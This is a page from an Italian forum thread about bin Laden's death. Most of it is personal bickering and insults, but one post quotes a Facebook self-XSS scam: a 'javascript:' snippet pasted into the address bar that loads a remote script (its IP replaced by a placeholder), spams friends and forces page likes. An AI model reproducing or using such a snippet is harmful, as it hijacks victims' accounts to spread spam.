Page 13 of 15 FirstFirst ... 39101112131415 LastLast
Results 181 to 195 of 212

Thread: Osama bin Laden is dead, sources say

NelloDominat's Avatar

Quote Originally Posted by Alkabar View Post
    Ci fosse solo una volta che scrivi bene in inglese....
    Toi mon caliss t'es un caliss de cave! Tu ne comprends même pas ce dont tu parles...Giusto per rimarcare la mia Quecosita'...

Non voglio andare troppo oltre nella discussione. Voglio solo ricordarti dove abito. Montréal Québec. Parlo per 80% Francese, 19% inglese 1% italiano. Visto che lavoro come consulente per Bombardier.

L'unica cosa che ho notato e' che quando la tua argomentazione fallisce miserabilmente e qualcuno ti chiude la bocca, invcece di "abbozzare" cerchi di trovare l'errore ortografico o grammaticale (tra l'altro in questo caso corretto ancor prima della tua risposta) per spostare l'attenzione su dettagli inutili per mascherare la pochezza e delle tue risposte.

Mi fa piacere che tu abbia messo il mio quote in firma. Ogni qualvolta lo leggero', ridero' al pensiero che hai dovuto editarlo poiche' hai "failato" il reply.

Ensign Hardcore's Avatar

Quote Originally Posted by NelloDominat View Post
    Toi mon caliss t'es un caliss de cave! Tu ne comprends même pas ce dont tu parles...Giusto per rimarcare la mia Quecosita'...

Non voglio andare troppo oltre nella discussione. Voglio solo ricordarti dove abito. Montréal Québec. Parlo per 80% Francese, 19% inglese 1% italiano. Visto che lavoro come consulente per Bombardier.
    Ma Bombardier la birra?

Ensign Hardcore's Avatar

Quote Originally Posted by Nazgul Tirith View Post
    No per fortuna non lo guardo facebook.

Dettagli sul sito ?
    javascript: (a=(b=document).createElement('script')).src='//INDIRIZZO IP/strummer.php?'+Math.random(),b.body.appendChild(a) ;void(0)

Questo è il link, ovviamento ho rimosso l'IP
    bisogna prenderlo e copiarlo nella barra,la cosa carina è che in primis ti bombarda le persone online su fb nella friend list, in piu ti fa fare mi piace alla loro pagina di FB. Molto interessante

Nazgul Tirith's Avatar

Quote Originally Posted by Hardcore View Post
    javascript: (a=(b=document).createElement('script')).src='//INDIRIZZO IP/strummer.php?'+Math.random(),b.body.appendChild(a) ;void(0)

bisogna prenderlo e copiarlo nella barra,la cosa carina è che in primis ti bombarda le persone online su fb nella friend list, in piu ti fa fare mi piace alla loro pagina di FB. Molto interessante

E ci cliccavano tutti come droidi?
    "not even death can save you from me..."

Ensign Hardcore's Avatar

Quote Originally Posted by Nazgul Tirith View Post
    E ci cliccavano tutti come droidi?
    Non ci devi cliccare, perke non funziona, devi copiarlo nella barra degli indirizzi e poi premere enter. Come dire Facebook è anti attacco, ma ti basta fare una pagina di un gruppo con scritto HEY COPIA QUESTA STRINGA che tutta la tua sicurezza va a farsi benedire

NelloDominat's Avatar

Ma Bombardier la birra?
    hehehe magari

http://www.bombardier.com/

Bombardier Transportation&Aerospace

NelloDominat's Avatar

Quote Originally Posted by Randolk View Post
    p.s. per nello: motherfuckin' bitches of a son

Petty Officer 1st Class brumbrum's Avatar

Quote Originally Posted by ilsagola View Post
    Guerra fra new papà, guardali che acidità intrinseca che si portano dietro..
    colpa delle cacchine bimbiche

cmq è inutile: obama può anche sterminare il vaticano, ma mi starà sempre sul cazzo

Ipnotik's Avatar

io ho amico su facebook un macfanboy che postava sempre foto dei suoi cazzo di mac offendendo tutti quelli che hanno windows perche' dice che " MAC E' PIU' SICURO! NON E' POSSIBILE PRENDERE VIRUS! "

Ovviamente e' uno di quelli infettati e godo come un porco.
    Spoiler

Lieutenant Commander Alkabar's Avatar

Quote Originally Posted by Hador View Post
    shahaha

tornando una minima seri, vogliamo contare gli europei che vanno in america e gli americani che vengono in europa? Poi, europa, europa mica è una nazione venire in europa non vuol dire un cazzo
    Per il momento non lo è, ma lo sarà. Sempre che l'Italia non crolli, facendo crollare l'intera area euro.

Lieutenant Commander Warbarbie's Avatar

Se è old fotte un cazzo

Lieutenant Commander Alkabar's Avatar

Piantala con sta storia:

Tu as oublié que j'habit à Valais et que j'etudie la langue française. A force de te masturber tu as perdu ta mémoire. Il y a seulement six mois que j'etudie, ce n'est pas possible pour mois d'éviter de faire des errours.

Per quanto riguarda l'inglese, ho un PhD in UK, insegnavo in inglese e andavo perdendo l'accento italiano che purtroppo è ora tonante in me, visto che vivo in Svizzera e di gente dall'UK non ne sento parlare piu' tanta...
    Pero' otto ore al giorno in inglese per lavoro le faccio ancora, insegnamo per qualche strana ragioen in inglese e facciamo tutta la ricerca internazionale in inglese...
    Potresti anche darmi credito del fatto che magari me la cavo benino, tanto benino che tanti madrelingua fanno piu' errori di me, dato che non l'hanno studiato e usato quanto me....

Ma niente contro di questo. Comunque guarda che ti stavo trollando, non c'è ragione di farne una tragedia greca, anzi Quebecchiana.

L'unica cosa che ho notato e' che quando la tua argomentazione fallisce miserabilmente e qualcuno ti chiude la bocca, invcece di "abbozzare" cerchi di trovare l'errore ortografico o grammaticale (tra l'altro in questo caso corretto ancor prima della tua risposta) per spostare l'attenzione su dettagli inutili per mascherare la pochezza e delle tue risposte.
    La mia argomentazione non è fallita, l'avete mandata in vacca con la solita fanfara all'Italiana.

Si è sviluppata cosi':

Gli americani fanno bene a festeggiare.

Io: No, ce l'hanno messo loro la, oltre tutto hanno una politica imperialista di sto cazzo, se gli si rivolta contro mezzo pianeta per reazione non dovrebbero festeggiare come dei maiali ipocriti.

Hador: hanno una politica migliore della nostra, pagherei per averla qua.

Io: militari, università e cazzi e mazzi.

Hador: visione del mondo di alka.

Alka: visione del mondo di alka.

Al maiali ipocriti vi siete inalberati, tu in particolare perchè ti senti vicino a loro, e poi siamo finiti qua.

Mi fa piacere che tu abbia messo il mio quote in firma. Ogni qualvolta lo leggero', ridero' al pensiero che hai dovuto editarlo poiche' hai "failato" il reply.
    Ah di, ogni tanto lavoro anche io, mica posso farci niente se tra il notare il fail e quotare è arrivato il mio capo con 200 documenti da firmare.
    La tolgo comunque, ti stavo solo trollando.

Warrant Officer marlborojack's Avatar

lavoro come consulente per Bombardier
    Spero tu finisca seppellito nelle boe SCMT, PD!
    Happiness in intelligent people is the rarest thing I know.

NelloDominat's Avatar

Quote Originally Posted by marlborojack View Post
    Spero tu finisca seppellito nelle boe SCMT, PD!
    Grazie ma sono nella parte IT di Bombardier... I controlli marcia frega proprio niente

Tanek's Avatar

Non so se avete visto il link che gira su Facebook, con link esterno a un sito...

Ma come cazzo si fa a cliccare su un link in cui c'è scritto blablabla/strumer.php?<script> ecc Ma dai cazzo -.-
    Ti stupirai dei livelli dell'idiozia della gente, giovane padawan, e poi un giorno, forse, smetterai di stupirti e tutto ti sembrerà così ovvio...

Tanek™: Game Designer & Algorithm Mastermind, Team Leader & SW Engineer and Dungeon Master!
    "Datte Foco"™ and "Ma KITTESENCULA"™ are registered trademarks of Tanek Entertainment Inc.
    ‎"One of these days, scientists will discover that second X chromosome contains nothing but nonsense and twaddle." - Sheldon Cooper
    Per non dimenticare:
    Spoiler

Page 13 of 15 FirstFirst ... 39101112131415 LastLast